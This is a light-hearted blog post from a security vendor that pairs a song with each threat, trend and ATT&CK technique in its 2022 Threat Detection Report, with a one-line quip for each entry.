Skip Navigation
Get a Demo

Liner notes

Threat sounds vol. 2: The 2022 Threat Detection Report playlist

We’re excited to drop the needle on Threat sounds vol. 2, a playlist to accompany the 2022 Threat Detection Report. Like last year, we picked a song for each of the most prevalent threats and ATT&CK techniques Red Canary observed in 2021. This time around, we’re opening the set with songs about trends to tie it all together. Read our liner notes below, and don’t forget to press play on Spotify!

Side 1: Trends

1. Ransomware

“Smooth Criminal” by Alien Ant Farm

Admins, are you okay? Ramsomware operators introduced a bevy of new tactics in 2021, leaving victims bewildered after getting struck by a smooth criminal.

2. Supply chain compromises

“Chain of Fools” by Aretha Franklin

You might feel like a fool for trusting a vendor that ended up getting compromised, but there’s actually a lot you can do to mitigate damage from a third-party intrusion.

3. Vulnerabilities

“Vulnerable” by Selena Gomez

High-profile proofs of concept like PrintNightmare and ProxyShell left our networks—and our hearts—feeling vulnerable.

4. Affiliates

“Affiliated” by Snoop Dogg

You never know who’s gonna show up for a verse on a Snoop Dogg track, and with the new “as-as-Service” economy taking hold, ransomware operators have also embraced the power of collaboration.

5. Crypters-as-a-service

Theme from “Tales From The Crypt”

If the “as-a-Service” trend continues, creepy crypters like HCrypt and Snip3 will send shivers up your spine and malware through your network!

6. Common webshells

“Common People” by William Shatner

William Shatner’s lack of vocal talent didn’t stop him from covering this Pulp song, and a lack of hacking chops won’t stop an adversary from exploiting web shells to target applications like Microsoft Exchange and Zoho ManageEngine.

7. User-initiated initial access

“Dynamite” by BTS

Adversaries often manipulate search engine results to lure victims into clicking on malicious links. In the spirit of SEO hijinks, we’re including this song from BTS to get more page views from K-POP fans.

8. Malicious macOS installers

“The Bird That You Can’t See” by Apples In The Stereo

Considering we name all of the novel activity clusters we track after birds, this song was a natural choice.

9. Linux coinminers

“She Works Hard For The Money” by Donna Summer

Coinminers—the most prevalent threat we observed on Linux environments for the past two years—make it so cybercriminals don’t have to work so hard for the money.

10. Remote monitoring and management abuse

“Oceans Away” by A R I Z O N A

By abusing legitimate tools such as ScreenConnect, Atera, and Anydesk, adversaries can gain access to victims’ environments from oceans away.

11. Abusing remote procedure calls

“Remote Control” by The Beastie Boys

Adversaries can abuse remote procedure calls (RPC) to escalate their privileges, as we saw in the PrintNightmare and PetitPotam attacks last summer.

12. Defense validation and testing

“Red (Taylor’s Version)” by Taylor Swift

We see a lot of testing on customer environments, often from open source tools like Atomic Red Team (Red Canary’s version).

Side 2: Threats

1. Rose Flamingo

“Kiss From a Rose” by Seal

One of several new activity clusters we identified last year, Rose Flamingo targets victims who are looking to download licensed software without having to pay for it. A “password” text file is this adversary’s power, pleasure, and pain.

2. Silver Sparrow

“Silver Springs” by Fleetwood Mac

Our article introducing Silver Sparrow macOS malware was the most read post on the Red Canary blog last year. Thank goodness our Intelligence team gets along better than the members of Fleetwood Mac.

2. Bazar

“How Bizarre” by OMC

It’s making us crazy trying to keep track of all the variants of the Bazar family of malware. Everytime we look around, there’s a new one in our face.

4. Latent threats

“Zombie” by the Cranberries

Don’t discount operations that appear to have ceased or been taken by law enforcement. Last year we saw a number of threats—such as WannaCry and Gamarue—come back from the dead like a zombey-ey-ey.

5. Yellow Cockatoo

“Yellow Ledbetter” by Pearl Jam

We saw a spike of Yellow Cockatoo detections in September 2021, just in time for flannel shirt and Doc Martins season.

6. Impacket

“Trust In Me (The Python’s Song)” by Sterling Halloway

This throwback from Disney’s The Jungle Book is evocative of the slithering manner with which adversaries abuse the Impacket library of Python scripts.

7. SocGholish

“Drive by” by Train

Contrary to what the lead singer of Train might tell you, that sketchy software update is in fact a SocGholish drive-by download.

8. BloodHound

“The Bad Touch” by the BloodHound Gang

This song is definitely NSFW…but then again, neither is malware.

9. Cobalt Strike

“Blue (Da Ba Bee)” by Eiffel 65

Now listen up, here’s the story, about a little adversary simulation tool that adversaries just can’t quit abusing for command and control.

10. Gootkit

“Everytime We Touch” by Goot

Everytime we touch a Gootkit detection, we’re amazed by how much this malware has evolved over the past decade.

Bonus tracks: Techniques

1. PowerShell (T1059.001)

“The Power” by Snap!

This Jock Jam will pump you up while diving into the Antimalware Scan Interface (AMSI) to detect evidence of PowerShell abuse.

2. Windows Command Shell (T1059.003)

“Shell Games” by Bright Eyes

Adversaries play shell games when they leverage Windows Command Shell for obfuscation.

3. Rundll32 (T1218.011)

“Run Away With Me” by Carly Rae Jepsen

Run away with us as we weed out malicious DLL files and jam out to this epic sax solo.

4. Windows Management Instrumentation (T1047)

“Time to Pretend” by MGMT

An adversary can use Windows Management Instrumentation (WMI) to move laterally across a system, essentially pretending to be an admin. Meanwhile, we’re pretending that indie rock from the early aughts is still cool.

5. OS Credential Dumping: LSASS Memory (T1003.001)

“Dancing On My Own” by Robyn

For this credential-dumping technique, we picked our favorite heartbreak anthem for anyone who just got dumped.

6. Ingress Tool Transfer (T1105)

“Maggie’s Farm” by Bob Dylan

Like Dylan going electric, some adversaries pivot from “living-off-the-land” techniques and drop their own tools on a victim system.

7. Process Injection (T1055)

“I Heard It Through The Grapevine” by The California Raisins

By injecting arbitrary code into an otherwise legitimate process, adversaries can evade defenders and even steal data, so they don’t have to rely so much on the grapevine.

8. Scheduled Task/Job: Scheduled Task (T1053.005)

“Five O’Clock World” by The Vogues

Adversaries abuse the Windows Task Scheduler to execute a recurring process or time their intrusions strategically, say, after the 9-5 shift ends and happy hour starts.

9. Obfuscated Files or Information (T1027)

“Outtasite (Outta Mind) by Wilco

We often see adversaries employ Base 64 encoding, string concatenation, and substrings to stay outtasite and outta mind.

10. Masquerading: Rename System Utilities (T1036.003)

“Suspicious Minds” by Elvis Presley

We can’t go on with all these suspiciously named system utilities floating around. Looking at you, AdFind.exe

11. Masquerading: Match Legitimate Name or Location (T1036.005)

“Who Are You” by The Who

*cue CSI theme song* who who? who who?

12. Hijack Execution Flow: DLL Search Order Hijacking (T1574.001)

“Steal My Sunshine” by Len

DLL filenames can be deceiving…just like how the lyrics and music video for this song might have you thinking that the members of Len are a couple. They’re actually brother and sister!

Back to Top